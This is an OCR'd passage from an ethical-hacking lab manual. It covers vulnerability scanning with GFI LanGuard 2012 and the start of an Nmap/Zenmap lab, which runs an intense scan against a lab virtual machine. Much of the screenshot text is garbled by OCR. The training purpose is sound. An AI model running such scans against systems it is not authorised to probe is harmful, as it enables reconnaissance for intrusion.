1 ( 74 A q 701? Patch Mfwtgnnnnl Added DCport for APS81? IS. Mohr. Arrvhm !) 5 2 Pro nnd Standivd tr.vi•n-
V*, 24-AJO-2012 -Patch M4uu«m< -Aiktod kuxkI 101APS812-1S. Mobm A uob* 10.1.4 Pro mtd St—a-0 - -M j ut

FIGURE5.3:TheGFILANguardmamwindow

m Customscans are
4. Click die L a u n c h a Scan option to perform a network scan.
recommended: GFI LanGuard 2012

> I «‫ ־‬I Doshboerd Scan Remediate AdMty Monitor Reports Configuration Ut*oes «t Di»e1«s thb version
■ Whenperforminga
onetime scanwith W elcome to GFI LanG uard 2012
particular scanning 1
GFI LanGuard 2012 &ready to audit your network k* *AmafrMws
parameters/profiles
■ Whenperformingascan Local Computer Vulnerublllty Level
for particular network use ‫־‬van a;# Agents‫־‬or Launch a scan‫ ־‬options 10 auoa
V ie w D a s h b o a rd

threats and/or system

information
the entire network.
JP Investigate network!wjineraMit, status andauairesults

R e m e diate S e cu rity Issu e s

■ Toperformatarget
computer scanusinga 9 Deploy missing patches unirwta■urau*>0rf2e430**are. turn on antivirus ana more.

specific scanprofile t - ‫יז‬.‫&־‬ ^-‫־־־‬ iim jIM : M anage A g e n ts

Cunent Vulnerability Luvul is; High % Enable agents to automate neteror* secant* aud* and totfstnbute scanning load
across client machines

L a u n c h a Scan
Manually *<rt-up andtnwer anagerttest network»taint/ autirl

LAI LSI NLWS

<j ?4-Ajq-TOI? - fa it h M<au»)«nenl - N r . pnxkjrf !^ported POF-XLhan^r Mena 2 ‫ ל‬TOb m

eula - IW 3 1
V* 24A jq-2012 Patch MnnnQcjncnr Added support forAPS812-16. Adobe Acrobat 9 5 2 Pro and Standard -»‫־«־‬-
24-Aju-2012 -Patch Md11rfut!«1t*t -Added support torAPS812-16. Adobe Acrobat 10.1.4 Pro and Standcffd - F=ad ‫■»־‬

^ If intrusiondetection
software (IDS) is running
duringscans, GFI FIGURE5.4:TheGFILANguardmainwindowindicatingtheLaunchaCustomScanoption
LANguard sets off a
multitude of IDSwarnings 5. Launch a N ew sca n window will appear
andintrusionalerts inthese
applications. i. 111 die Scan Target option, select lo c a lh o s t from die drop-down list
ii. 111 die Profile option, select F u ll Scan from die drop-down list
iii. 111 die Credentials option, select c u rre n tly lo g g ed on u s e r from die
drop-down list
6. Click S c a n .

C E H Lab M anual Page 115 E th ic a l H ackin g and Counterm easures Copyright O by E C ‫־‬Counc11
A ll Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

GF! LanGuard 2012 ’‫ ן ־‬° r x ‫־‬

•> l«- I Dashboard Scan Ranrdijle Activ.tyMonitor Reports Conf!guraUon Jt Urn CJ, Uiscuuttm1
ta u a d ia tn e S a n

Scar‫־‬a02‫׳‬t: P10•*:
b a te : v M jf-J S^n v *
Ot0en:‫־‬fc- ?axrrard:
k»/T«rt(r ockcCon uso‫־‬ V IIZ * 1 1 ‫״‬

Scar Qaccre...
Son ■ n d ti Ovrrvlew SOM R ru lti Dcta ll<

m For largenetwork
environments, aMicrosoft
SQLServer/MSDE
database backendis
recommendedinsteadof
theMicrosoft Access
database.

FIGURE5.5: Selectinganoptionfornetworkscanning
7. Scanning will s ta rt; it will take some time to scan die network. See die
following figure

m Quickscans have
relativelyshort scan
durationtimes comparedto
full scans, mainlybecause
quickscans perform
vulnerabilitychecks of only
asubset of the entire
database. It is
recommendedto runa
quickscanat least once a
week.

8. After completing die scan, die s c a n re s u lt will show in die left panel

C E H Lab M anual Page 116 E th ic a l H ackin g and Counterm easures Copyright O by EC-Council
A ll Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

GFI Lar>Guard2012 ,‫ ־‬I□ ‫־‬x

& yI
ta u K k a lm k in
I Dashboaid Scan Remcdute Actwty Monitor Reports Configuration Lttrfrtm

ScanTarget Kate:
ccaftoct V ... | FalSar H
jsandffc: Eaaswofd:
Cj-rr&tbcaed on iser V II
Scan R r u ik i ovrrvm n Scan R r a k i Details

4 Scan target: locatbo»t

- y) 52 10 0 0 7 IWDI-039MR5II19C4] (WhkJvws . S ca n c o m p le te d !
* Summary 8f *ear resufs 9eneraf0fl <Jut>51

V u ln e ra b ility le v e l:
m Types of scans: The average vulnerabilty le.ei lor ttus sea‫־‬nr s 1

Scana singlecomputer:
Select this optionto Results statistics:
scanalocal host or one Audit operations processed; 1>703 aw*! operations processed

specificcomputer. Missing scftwaie updates:

Other vulnerabilities:
20 <20 C‫ ׳‬tcai‫׳‬Hgr>
1313 Crecol'-.qh)
Potential vulnerabilities: 3
Scanarange of
computers: Select this Scanner ActMty Wkxkm •
optionto scananumber ‫*ו^יז‬ CanptJer Citar

of computers defined W fa :ili« !* W VJUH> ra W J t« !a i K t - n •can n » 11‫ ״‬t41:ate 101 r r s q v wunr is*lvatd or not found
i
throughanIPrange. ----------12- 1

Scanalist of computers:
Select this optionto FIGURE5.7:TheGFILanGuardCustomscanwizard
import alist of targets
fromafileor to select 9. To check die Scan Result Overview, click IP ad d ress of die machiiiein die
targets fromanetwork
list. right panel
Scancomputers intest 10. It shows die V u ln e ra b ility A s s e s s m e n t an d N e tw o rk & S o ftw a re A udit:
file: Select this optionto
scantargets enumerated click V u ln e ra b ility A s s e s s m e n t
inaspecific text file.
GFI LanGuard 2012
Scanadomain or E- J |^ | Daihboard Sean R nrw U r AdMyMorilor Reports Configuration UtMws W, Dis c u m tvs vtssaan

workgroup: Select this

optionto scanall targets PceSe
connectedto adomain ocafost v j. . . | |F‫״‬IS1‫״־‬ * ‫*ו‬
or workgroup. Qi33iT~.it.. Userrvaae: ?a££‫׳‬.Crd:
Cj‫־‬end, bcaec onuser II J ••• 1 ___^ ____ 1

1Results Details

# V a n t n r y t : lornlhost |
| - 1000 ‫ר־‬V |WIW l)J9MIC>Mt9L4l (Window. J] j ‫[ ׳‬W»UJ39MRSHL9f4| (Windows Server ?01? 164)
« , <1>rrafcj1ty W ^ n r r n t |
‫•־‬ n Net-war* & Softwire Audit
Vulnerability level:
T►•* corrvwar dues not have a Vuhe'aHty te.el •VII. * :

Y/lttt dim irean?

Po s s ib le reaso n s:

t. Th• •can b not Inched yet

2.OsCectbn of missing paiches and vane‫ ׳‬abiEe* 8 smUta* ‫» »ליינ‬ca1‫׳‬nir aerode used to performthe scan.
3‫ ־‬The credentials used 10 scan this confute‫ ׳‬0 ‫ ג‬not »1: * 9 * «cnty ecamer 10 retrieve an required tafomwtion 10•
escmatra we Vjheraoity Level An account wth s M i r r a , • :rvjeges or rne target computer B requrM
* Certan securty srttnqs on the remote conpuler Dtoct r * access 0( Ite security scanner. Betam s a fart of most

Scaruicr ActMty Window

flteetlKMQL llirv^dl(klh•) u.
.‫״‬M •'■<V> IIc— tfiiSldriIftwwl

FIGURE5.8: SelectingVulnerabilityAssessment option

C E H Lab M anual Page 117 E th ic a l H ackin g and Counterm easures Copyright O by EC-Council
A ll Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

11. It shows all the V u ln e r a b ilit y A ssessm en t indicators by category

V GFI LanGuard 2012 ‫־־‬T ^ P x ‫־‬

/ 7 Duringa full scan, L d > «‫־‬ Dashboard Scan Rernediate Activity Men!tor Reports Configuration UUkbes W, Di 8cub 8 •»a v«a«on._

GFI LANguard scans l a — d i a Merc Scan

target computers to retrieve Bar Target;

v | | .. .
»roS»:
H i scar- 3 $
setupinformationand c/fomess Jgynang: Password:
identifyall security [am r#y iCQjjetf onuser
V1
5or
vulnerabilities including:
■ MissingMicrosoft Scmi Rr»ulU Ov*rvt*%» Sc4nR*M1ft>0«UNk

updates <0 $ u a U r « « t : l1 ) u lm l
f S I S ItM J(m R-K M M U H U M ](W M tom . V u ln e ra b ility A sse ssm e n t
- • Yuhefablty Assessment s«tea ene of the folowno wjfcerabilry 01*99'** ‫ייה»*ל‬
■ Systemsoftware A ‫ * *־י‬security wirerablofa (3)
information, including J l MeCtomSearity Vuherabirtes (6)
*qn security Vumeratxaties (3) A
unauthori2ed j , low Searity Viinerablitfes (4J
4 PofanBd Vuherabltea (3)
10
Xbu you toanalyze the ‫־ ״‬security vjre tb i'.a

applications, incorrect t Meshc service Packs and U3cate =&u>s (1} ^ ■

Jedium Security VulneraNKies )6 (
antivirus settings and # Msarvs Security Updates (3)
- _* Hee*ak & Software Ault
,‫ וגי‬toanajy7e thsrredun !earitytfjrerabises

outdatedsignatures .
^
Low Security Vulnerabilities 14(
15
ycu to a‫ ׳‬iy» thelc« 9eculty

■ Systemhardware . Potential vulnerabilities )1(

Xb>.s you to a-elvre tiie informationsecurity aJ‫־־‬o
information, including «1
connectedmodems and Ufesing S vtca P acks and Updala RolHipc (1)
U>»3vcutoane(yK thcrm eiroiervm pK tsnV m evn
USBdevices

thread I (Idle) |Scan Pvead 7 (•is' I 5 u n t1 « : 3 Otfic] Bras

FIGURE5.9:List ofVulnerabilityAssessmentcategories
12. Click N e tw o rk in die right panel, and then click S y s te m
& S o ftw a re A u d it
P a tc h in g S t a t u s , which shows all die system patching statuses
C r i L in O u a rd 2012 1- ‫ ״‬r ‫ ״‬1
to■ > •4 - 1 Dashboard Sran Re‫*»״‬Aate Activity Monitor Rrpoits Configuration JM M et <U) ' D iic in t llm vm*an

la u a d ia New Sean

Scar ’ • o e ‫־‬- Ho ft*.

- 1 1'‫־״‬ ^ v |•
O afattab: Jse n re ; P315/.ord:
|0 rrentf> o g c « or u er Sari
‫ ־‬1

SCM R « M b Overview 1Rem its Detais

- 9 Scan ta rve t iocalhost

- 3 1 8 I M A / [W » 0 3 9 N R S W « 4 ] ( I M l t K - m System Patching Status
S -4 (U‫!־‬f(hilY to n T e il Select one of tte Mtahg systemwtchro M U
* *ehSecvltyV1*1eraM ittet(3)
X rvfcdun Security VUrtrabilBe• (6) Minting Service P acks ■•nit llpduir Rciaup* )1(
X ‫ יי»־‬Sec“ ' >ty\\1h»ab4U»» (4)
Duetothelarge X *JnaraMt)••(‫)ג‬ AI3v»1 you to andyM f*r rrs «‫־‬K! server parW r>f»—j i w

amount ofinformation t ServicePnrinmi1t3datr Roittn (1) )Mk Missing Security Updates (,J
'0
I ‫\״‬ftoary.a^ftraarcruOtI
f •1su1sSeu1UyUl>0at«*(3) Alotwt Mu U nWy.'t u!« mistfio mcuICv update I
■ - Jb j
retnevedfromscanned m Missing Non-Security Updates )16(
targets, full scans often S % Ports
Alan* you to analyie the rwn-security ipaaws rfamssen

tendto belengthy. It is U A rtor&Atrc J% staled Security Updates )2(

recommendedtorunafull *»- f i Software 1 2
A qt>syou‫■־ ט‬nay c tJic knitaifedsecurity!edatehfanala
scanat least onceevery2 a system mibnnaaon
J%!astaaed Non-SecurityUpdates )1(
weeks. Alo‫״י‬you to analyze thenstslicd nor-securty5

Scanner A ctm ty Wmdow X

Starting security scan of host \VIM.I)MMRSMl«4[100.0 T\ g

!■nr: I M k U PM

: ry Scan thread 1(idle) S a tllia i IM t ' . ! 10 :‫ י‬t «. 3 ™

FIGURE5.10: Systempatchingstatusreport
13. Click P o rts, and under diis, click O p en T C P P o rts

C E H Lab M anual Page 118 E th ic a l H ackin g and Counterm easures Copyright O by E C ‫־‬Counc11
A ll Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

GF! LanGuard 2012

m Acustomscanis a
& •> l«- I Scan Rancdijlr £*!1vty Monitor Reports Corrfigura
1- 1■■
CJ, Uiscuu tins1

networkaudit basedon jbcahoK V I ... I |MSw1

parameters, whichyou Oc0en‫־‬.dfe. Uenvaae: SasGword:
‫•ויי‬

configure onthe flybefore |0xt«rtK ocKcCon us®‫־‬

- II 1___ * = ____1
launchingthe scanning
process.
Vanous parameters canbe 9 sr.Mi f .‫׳ר‬get‫ ־‬torn lho\t 0
• ft) so iDf*crpno‫״‬: Mytxrtrrt trerwfrr Protocol {^‫> ליודז‬sr-wr: http (kt/ er r « t Tfonjfcr rvotocoOI
‫ •־‬R : ; 10.0.0.7 |WIN-D39MR5H19C4| (W m d v n _ ^9 5‫( כג‬Cwucto- DCC w»i1u‫ ״‬l ‫«׳‬sOl)0«‫־‬
customizedduringthis type - • viAwjBM y **OMtwrnt f)
£ 1 ►**CTt*0‫׳‬V HMKCR 5M»1‫ ׳‬S*rM» S*‫׳‬VCT r « » ‫״‬n] !
of scan, including: J l ‫)*־‬h Sacuity »\jh*r<t14t*» (!) ^ 44J Pfiapton: MooioftOS k tt * Omlav, VNntfcM*V a n fimitw:
Lrtnamn]
^ M«Jum Sttuity VllnefdMIUe( « } B £ !027 piM otOor: !r#l»1fo, 1( tM&*e‫ ׳‬v<e h no* t1‫»׳‬Urt(d :*•>*« caJO
&• Croj^r: Ctandwone, Ditdflpy *rd others / Sev»C

■ Typeof scanningprofile X Law Seeunty VUnerabttiei (4} s ^ t-.H |Deunpecr: LSASS, If Iha » m « is not ratafc* be-*ae m3
ratfc ;<■» o w : Ctotafipy Network x, Oath a owers / Ser
^ POCWlOai Viiic'attittet (3) - 9 ::- 2 |C«SObacn: Me Protect. MSrtQ, t ‫״‬te 1V. M>)eic ‫־‬-» -‫י‬- » * c ro( IrsUltod D*m«r* could ttt trojan: BLA trojan . Se 4‫׳‬
(Le., the typeof checks # Moang Service Pocks 0‫״‬d tp d str lo tto s CO « £ l2^l|t«croor:N fss1i5Jcar1ty5canr*rr/servct:1r*n0M ^
srtscnServer /S«‫>־‬ic*: LTknown]
to execute/type ofdata B
# MsangSecuity Updates (3)
*•ernoHc 81Software Audit
9 ^ 1433 [CesccCcr: Microsoft SQL Server database r a ‫־‬a j r w :

toretrieve) *. ( ( System Patchrg Status

]‫־‬333
I . S
eenHPParaW|
■ Scantargets •V Coen LC» Ports (5)
I A Hardware
■ Logoncredentials .if Software
II System [nfbmodon

a — er ActKRy YVlndvw

*' f..<»t‫»*׳‬ceve‫ ׳‬y v a n thread 1 (tdlr) S o ‫ ״‬nr rad ‫) י‬dp ( | 5 0 ‫ ־‬r *‫׳‬. vl ! ;<*) error•

FIGURE5.11:TCP/UDPPortsresult
14. Click S y s t e m In fo rm atio n in die light side panel; it shows all die details of
die system information
15. Click P a s s w o r d P o lic y
GH LanGuard 2012 r‫־־‬° n n
E B > 1 4 -1 Dathboaid Scan fn m ijlr Act*«y Monitor Reports Corriiguratioo Ualiwt W. 1)1*1 lew •«« vnun
launch a Mewsean
ScarTarget P0.‫ «־‬t:
ocaKx: v |... I (‫׳‬SjIScan
3 •
&ederate: ?aaiwd:
Z~M~CTt, bcced on toe‫־‬ V 1U1J 1__

Scaf 0 0 ‫^כפ‬.-.
Scan R rta tf Overview Scan le a k ! Detalie
% open IX P Ports (5) J *‫!־*׳‬run poaaw d length: chars 0
Sf A r1ard*«e J Vaxnuri EMSSiwrd age: 42days
*50 ‫־ ׳‬1‫־‬fr»ane J **‫״!־‬unoaa'w ordsgeiodays
| Systsn Infer‫׳‬TMharj J ! f a s « p f f r m ‫ ׳‬force
a 9ki\‫׳‬. W J >Mgw rfl mtary: n o h ttay
0
,
|l HW.\fxC. !■■>>•>1

L_J The next jobafter a • S«r.c1ll> Audit Policy (OtO

Wf Re0**v
networksecurityscanis to ft Net&OS Mao*3) ‫) ״‬

identifywhichareas and % Computet

tj| 610Lpt (28)
systemsrequireyour & Users (4)
immediateattention. Do •!_ LoggedCnUsers (11)

this byanalyzingand ^ Sesscre (2)

% J<rvcc5 {148}
correctlyinterpretingthe ■U Processes (76)

informationcollectedand , Remote TOO (Tme Of Oay)

generatedduringanetwork Scanner AcUv«y Window

securityscan.
‫ ״ ׳ ••־‬I I >«- ‫ ׳‬V 1‫״‬n thn-rtd I (Klfc•) ScantheflUC*) i f<* 41‫'׳' ! ־‬ ’A) I ‫'"׳י י‬

FIGURE5.12InformationofPasswordPohcy
16. Click G ro u p s: it shows all die groups present in die system

C E H Lab M anual Page 119 E th ic a l H ackin g and Counterm easures Copyright O by E C ‫־‬Counc11
A ll Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

‫ ׳‬-T o -

m Ahighvulnerability
level is the result of
* >‫־‬ Dashboard Sun ftftnca&e
GFI LanGuard 2012
ActmrtyMonitor Reports Configuration U19CUB3UlttVWttKJR— ‫ר‬
vulnerabilities or missing vl W **Scan
patches whose average CrM e re s t -igemane: Password:
H

severityis categorizedas [cuT€r*f eooed cn user *1

high. ■cc':era

1R«f»*lt» Overview Sc*• RevuJU DeUik

% C0«nUOPPwts(5) * tt Control AucUat* Cws abx1
r A Hentesrc ■ft * P n t t a w i
• . 1 Soffaart •ft 0*Ji.s0u«1»to1‫׳‬
• ^ Symrm tnk‫׳‬m»t»n •X cmfcwaw#dccmwra
*k SN r~ W • aO (V'teyjM‫^ויו^ו‬
‫<׳‬- ‫ו׳‬
-4* Pd«wo1‫ ) ׳‬Pdiy • a CfctrtutedCCMUser*
- i» Sxunty Ault Pokey (Off) ‫ י‬a Guests
& *n t Log Straefcrs
# ‫ ־‬lUotetry • a K>pe‫ ׳‬V
f t NetflCCS Narres (3) •a Adrritstrators
% Computer
l*i groups(2a)I ‫ יי‬a E5JUSRS
I W4}
• a r.etY>=‫<׳‬Ccnfig.rstcn Cp‫־‬rators

•?. -OXfC0‫ ״‬users (1 ‫)נ‬

‫״‬-a Psrfertrsnce Log Users
• a Pr‫־‬fty1r5rcc '\r~ausers
Ascheduled scanis a % S«ss»ns (2)
%5«14)8»:*‫ל‬a) • a PM^lSers
» a RES Ehdpcut Servers
**?Operators
networkaudit scheduledto Ht ®rocrase* (76) •«
run automaticallyona ‫ ג‬en»te too ‫ מיוחן‬Of 0»y) ‫ז‬a PCS Manage‫»״‬ent s « vers

specificdate/time and at a
specific frequency.
Scheduledscans canbe set
toexecuteonce or W w rt* ‫ ״‬- . S*rf« 1 l1f1 .nl 1 (tdl•‫ | )׳‬Scan tfve*0 ? frt*) *r«*d S * fe ) | & u « |

periodically.
FIGURE5.13:InformationofGroups
17. Click die D a sh b o a rd tab: it shows all the scanned network information
GFI LanGuard 2012 1 °n ^ ‫׳‬
> «- I Dashboardl Sun Km•*•(• Activity Monitor Reports Configuration UUkbe; ‫זי‬/.‫ ־‬OitcuMlna vwawn.-

5‫ ״‬I q Gmp
!t f#
Cemctm
\'i\
•w«v
^
1ViAirrnhlfces
4
* t
Pale►**
V
►aH
*J
fei
SdNiare
v (

it 6mel1n*ork E n tire N e tw o rk -1 c o m p u te r
f j UKJ»-c«t: ttlh-03»Ma.5rt.4£-»
Security Seniors
‫^' ־‬ucj1!)<»w>:y10«j<1iR<x1>
wnwarn iwuw•
m It is recommended to 1 o
use scheduled scans: rS \ 0 c«XT‫|־‬H1tcrs

Service Packs and U-

^ ‫ ז‬K-p-w!

Lratra-onied Aco*c
0 coneuteis

Malware Protection ...

■ Toperform Most M rarane cawoJSfS Oaxrputers
‫ כ‬O
Cco‫־‬pu‫־‬crj
cj
‫ ו‬computers
periodical/regular V. S C 3 y ‫ ^ ׳‬L 3 6 4
VulncraWWies _ Ault SMTUt : _ Agent Hemtn Issues
networkvulnerability I o •
scans automaticallyand 1co‫״‬pot«r9 0 « ‫! »י ״י ד‬ j 0 C0npu18C8

usingthe same scanning ,AiirraNity Trend Owe' tme

profiles andparameters
• To tngger scans
automaticallyafter office
hours andto generate
alerts andauto- w Computer V14>erabfeyCBtnbulivi : o ‫ ־‬fu t M By Gperatng System

distributionof scan
o
Maraqe saerts
resultsviaemail *41 •»?i ■ .KTJlii...

ZjHar-scan...
Sc-=r a d rsfrar. !TfaraaLgi p.gyy

■ To automaticallytrigger Sec :ppdy-.ai -

auto-remediation C^pm:-jr_ 1*aer*Stofcg|\>3tStafcg| Computes S■O0«ath■ ■.| Compjters By rfeUai... |

options, (e.g., Auto

downloadanddeploy
missingupdates) FIGURE5.14: scannedreportofthenetvrork

L a b A n a ly s is

Dociunent all die results, direats, and vulnerabilities discovered during die scanning
and auditing process.

C E H Lab M anual Page 120 E th ic a l H ackin g and Counterm easures Copyright O by EC-Council
A ll Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

Tool/U tility Information Collected/Objectives Achieved

Vulnerability Level
Vulnerable Assessment
System Patching Status
Scan Results Details for Open TCP Ports
Scan Results Details for Password Policy
GFI LanGuard
Dashboard - Entire Network
2012
■ Vulnerability Level
■ Security Sensors
■ Most Vulnerable Computers
■ Agent Status
■ Vulnerability Trend Over Time
■ Computer Vulnerability Distribution
■ Computers by Operating System

P L E A S E T A L K TO YO U R IN S T R U C T O R IF YOU H A V E Q U ES T IO N S
R E L A T E D TO TH IS LAB.

Q u e s t io n s

1. Analyze how GFI LANgtiard products provide protection against a worm.

2. Evaluate under what circumstances GFI LAXguard displays a dialog during
patch deployment.
3. Can you change die message displayed when GFI LANguard is performing
administrative tasks? If ves, how?

Internet Connection Required

□ Yes 0 No
Platform Supported
0 Classroom 0 iLabs

C E H Lab M anual Page 121 E th ic a l H ackin g and Counterm easures Copyright © by EC-Council
A ll Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

E x p lo rin g a n d A u d itin g a N e tw o r k
U s in g N m a p
N /n a p (Z e n m a p is th e o ffic ia l A ',m a p G U I) is a f ir e , o p e n s o u rc e (lic e n s e ) u t ilit y f o r

n e tw o rk e x p lo ra tio n a n d s e c u rity a u d itin g .

I C O N K E Y L a b S c e n a r io
Valuable 111 die previous lab you learned to use GFI LanGuard 2012 to scan a network to
information
find out die vulnerability level, system patching status, details for open and closed
Test vour ports, vulnerable computers, etc. A11 administrator and an attacker can use die same
knowledge
tools to fix or exploit a system. If an attacker gets to know all die information about
S Web exercise vulnerable computers, diey will immediately act to compromise diose systems using
reconnaissance techniques.
‫ט‬ Workbook review
Therefore, as an administrator it is very important for you to patch diose systems
after you have determined all die vulnerabilities in a network, before the attacker
audits die network to gain vulnerable information.
Also, as an e t h ic a l h a c k e r and n e tw o rk a d m in is tra to r for your company, your job
is to carry out daily security tasks, such as n e tw o rk in v e n to ry , service upgrade
s c h e d u le s , and the m o n ito rin g of host or service uptime. So, you will be guided in
diis lab to use Nmap to explore and audit a network.

L a b O b j e c t iv e s

Hie objective of diis lab is to help students learn and understand how to perform a
network inventory, manage services and upgrades, schedule network tasks, and
monitor host 01 service uptime and downtime.
hi diis lab, you need to:
■ Scan TCP and UDP ports
■ Analyze host details and dieir topology
■ Determine the types of packet filters

C E H Lab M anual Page 122 E th ic a l H ackin g and Counterm easures Copyright © by EC-Council
A ll Rights Reserved. Reproduction is Strictly Prohibited.
 M o d u le 0 3 - S c a n n in g N e tw o rk s

■ Record and save all scan reports

/—j T o o ls
d e m o n stra te d in
■ Compare saved results for suspicious ports
th is la b a r e
a v a ila b le in L a b E n v ir o n m e n t
D:\CEH-
To perform die lab, you need:
T o o ls\ C E H v 8
M o du le 0 3 ■ Nmap located at D :\C E H -T o o ls\C EH v 8 M o d u le 0 3 S c a n n in g
S c a n n in g N e tw o rk s\ S c a n n in g T o o ls\N m ap
N e tw o rk s
■ You can also download the latest version of N m a p from the link
http: / / nmap.org. /
■ If you decide to download die la t e s t v e r s io n , dien screenshots shown in
die lab might differ
■ A computer running W in d o w s S e rv e r 2012 as a host machine
.Q Zenmapworks on
Windows after including ■ W in d o w s S e r v e r 2 0 0 8 running on a virtual machine as a guest
Windows 7, and Server
2003/2008. ■ A web browser widi Internet access
■ Administrative privileges to run die Nmap tool

L a b D u r a t io n

Time: 20 Minutes

O v e r v ie w o f N e t w o r k S c a n n in g

Network addresses are scanned to determine:

■ What services a p p lic a t io n n a m e s and v e r s i o n s diose hosts offer
■ What operating systems (and OS versions) diey run
■ The type of p a c k e t f ilt e r s / f ir e w a lls that are in use and dozens of odier
characteristics

T AS K 1 Lab T asks

In te n s e S c a n Follow the wizard-driven installation steps and install Nmap (Zenmap) scanner
in die host machine (W in d o w S e r v e r 2 0 1 2 ).
1. Launch the S t a r t menu by hovering die mouse cursor in the lower-left
corner of the desktop

FIGURE6.1:WindowsServer2012—Desktopview

C E H Lab M anual Page 123 E th ic a l H ackin g and Counterm easures Copyright O by EC-Council
A ll Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

2. Click the N m a p -Z e n m a p G U I app to open the Zenm ap window

S t 3 f t A d m in is tra to r

l_ Zenmap fileinstalls Server Windows Google Hy^-V Nmap -

Manager PowrShell Manager Zenmap
the following files:

■ NmapCoreFiles Sfe m * ‫וי‬

Control »■vp*v
■ NmapPath Panel Virtual
Machine..

■ WinPcap4.1.1 o w
■ NetworkInterface Command
Prompt Frtfo*
Import e
*‫ח‬ ©
■ Zenmap (GUI frontend)
Me^sPing HTTPort
■ Neat (ModernNetcat) iSW M

■ Ndiff CWto* K U
1

FIGURE6.2WindowsServer2012- Apps
3. The N m ap - Z e n m a p G U I window appears.

! Nmap Syntax: nmap

[ScanType(s)] [Options]
{target specification}

FIGURE6.3:TheZenmapmainwindcw
/ Inport scan
techniques, onlyone 4. Enter the virtual machine W in d o w s S e r v e r 2 0 0 8 IP a d d r e s s (10.0.0.4)
methodmaybeused at a t!1e j a r g e t: text field. You are performing a network inventory for
time, except that UDP scan r o J
(‫־‬sU) andanyone of the the virtual machine.
SCTPscantypes (‫־‬sY, -sZ)
maybe combinedwithany 5. 111 tliis lab, die IP address would be 1 0 .0 .0 .4 ; it will be different from
one ofthe TCP scantypes. your lab environment
6. 111 the text field, select, from the drop-down list, the
P r o file : ty p e o f
p ro file you want to scan. 111 diis lab, select In t e n s e S c a n .

C E H Lab M anual Page 124 E th ic a l H ackin g and Counterm easures Copyright O by E C ‫־‬Counc11
A ll Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

7. Click S c a n to start scantling the virtual machine.

Zenmap ‫׳‬-‫ ׳‬° r x
Scan I o o ls P ro file Help

Target: 1 10.0.0.4| Profile: Intense scan

C om m and: nm a p -T4 -A - v 10.0.0.4

H o s t! Services
icc> | Nm ap O utput Ports f Hosts | T o po lo gy | Host Details | Scans
WhileNmap attempts OS < Host
toproduce accurateresults,
keepinmindthat all ofits
insights are basedon
packets returned bythe
target machines or the
firewallsin front ofthem

FIGURE6.4: TheZenmapmainwindowwithTarget andProfileentered

!S "The sixport states
recognized byNmap: 8. Nmap scans the provided IP address with In te n s e s c a n and displays
■ Open the s c a n r e s u lt below the N m a p O u tp u t tab.
^ ‫ז ם י‬ X ‫ן‬
■ Closed Zenm ap

Scan I o o ls E rofile H elp

■ Filtered
Target: 10.0.0.4 Profile: Intense scan Scan:
■ Unfiltered ‫׳י‬
C om m and: nm a p -T4 -A - v 10.C0.4
■ Open| Filtered
N n ■ap O utp ut [p o rts / Hosts | T o p o lo g ) | H o st Details | Scans
■ Closed|Unfiltered
OS < Host n m ap -T4 •A ■v 10.00.4 ^ | | Details

‫׳׳‬ 10.0.0.4
S t o r t i n g Nmap C .O l ( h t t p : / / n m s p . o r g ) at 2012 0 8 24

NSE: Loaded 9 3 s c r i p t s f o r s c a n n in g .
MSE: S c r i p t P r e - s c a n n in g .
I n i t i a t i n g ARP P in g Scan a t 1 5 :3 5
S c a n n in g 1 0 . 0 . 0 . 4 [ 1 p o r t ]
C o m p le te d ARP P in e S can a t 1 5 : 3 5 , 0 . 1 7 s e la p s e d (1 t o t a l
h o s ts )
I n i t i a t i n g P a r a l l e l DNS r e s o l u t i o n o f 1 h o s t , a t 1 5 :3 5
C o m p le te d P a r a l l e l DNS r e s o l u t i o n o f 1 h o s t , a t 1 5 :3 5 ,
0 .5 0 s e la p s e d
I n i t i a t i n g SYN S t e a l t h S can a t 1 5 :3 5
S c a n n in g 1 0 . 0 . 0 . 4 [1 0 0 0 p o r t s ]
D is c o v e r e d o pe n p o r t 135!‫ ׳‬t c p on 1 6 .0 .0 .4
D is c o v e r e d o pe n p o r t 1 3 9 / t c p on 1 0 .0 .0 .4
D is c o v e r e d o pe n p o r t 4451‫ ׳‬t c p on 1 6 .0 .0 .4
I n c r e a s in g se n d d e la y f o r 1 6 . 0 . 0 . 4 f r o « 0 t o ‫צ‬ d ee t o 72
o u t o f 179 d ro p p e d p ro b e s s in c e l a s t in c r e a s e .
D is c o v e r e d o pe n p o r t 4 9 1 5 2 / t c p o n 1 0 . 0 . 6 . 4
Nmap accepts D is c o v e r e d o p e n p o r t 4 9 1 5 4 / t c p o n 1 0 . 0 . 6 . 4
multiple host specifications D is c o v e r e d o pe n p o r t 4 9 1 5 3 / t c p o n 1 0 . 0 . 6 . 4

onthe commandline, and D is c o v e r e d o pe n p o r t 4 9 1 5 6 / t c p o n 1 0 . 0 . 6 . 4

D is c o v e r e d o pe n p o r t 4 9 1 5 5 / t c p o n 1 0 . 0 . 0 . 4
theydon't needto be ofthe D is c o v e r e d o pe n p o r t 5 3 5 7 / t c p on 1 0 . 6 . 0 . 4
sametype. Filter Hosts

FIGURE6.5:TheZenmapmainwindowwiththeNmapOutputtabforIntenseScan
9. After the scan is c o m p le t e , Nmap shows die scanned results.

C E H Lab M anual Page 125 E th ic a l H ackin g and Counterm easures Copyright O by E C ‫־‬Counc11
A ll Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

Zenm ap T= I
Scan I o o ls £ ro file Help

Target: Scan! Cancel

C om m and: nm a p -T4 -A - v 10.C.0.4

a The options available N m ap O utp ut | Ports / Hosts | T o p o lo g ) JH ost Details | Scans

to control target selection:
■ -iL<inputfilename>
OS < Host n m ap •T4 •A ■v 10.0.0.4
‫פ כ‬ ‫י‬ Details

